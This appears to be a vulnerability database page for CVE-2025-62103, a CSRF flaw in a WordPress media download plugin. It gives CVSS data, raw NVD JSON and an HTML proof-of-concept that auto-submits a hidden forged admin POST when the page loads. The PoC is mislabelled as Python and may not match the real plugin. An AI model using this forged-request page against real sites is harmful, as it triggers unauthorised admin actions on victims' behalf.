Security Vulnerability Report
中文
CVE-2025-62103 CVSS 4.3 MEDIUM

CVE-2025-62103

Published: 2025-12-09 16:18:01
Last Modified: 2026-04-27 17:16:32

Description

Cross-Site Request Forgery (CSRF) vulnerability in wpmediadownload Media Library File Download media-download allows Cross Site Request Forgery.This issue affects Media Library File Download: from n/a through <= 1.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Media Library File Download plugin (media-download) <= 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62103 --> <!-- Media Library File Download Plugin CSRF Exploit --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-62103</title> </head> <body> <h1>CSRF PoC for WordPress Media Library File Download Plugin</h1> <p>This PoC demonstrates the CSRF vulnerability in Media Library File Download plugin <= 1.4</p> <!-- Auto-submit form to trigger file download action --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin.php" method="POST" style="display:none;"> <input type="hidden" name="page" value="media-library-download"> <input type="hidden" name="action" value="download_media"> <input type="hidden" name="media_id" value="1"> <input type="hidden" name="_wpnonce" value=""> </form> <script> // Auto-submit form on page load document.getElementById('csrfForm').submit(); // Alternative: Use fetch API for more control /* fetch('https://target-site.com/wp-admin/admin.php', { method: 'POST', mode: 'no-cors', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'page=media-library-download&action=download_media&media_id=1' }); */ </script> <p>If you see this message, the CSRF attack has been executed.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62103", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:01.187", "lastModified": "2026-04-27T17:16:32.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in wpmediadownload Media Library File Download media-download allows Cross Site Request Forgery.This issue affects Media Library File Download: from n/a through <= 1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/media-download/vulnerability/wordpress-media-library-file-download-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}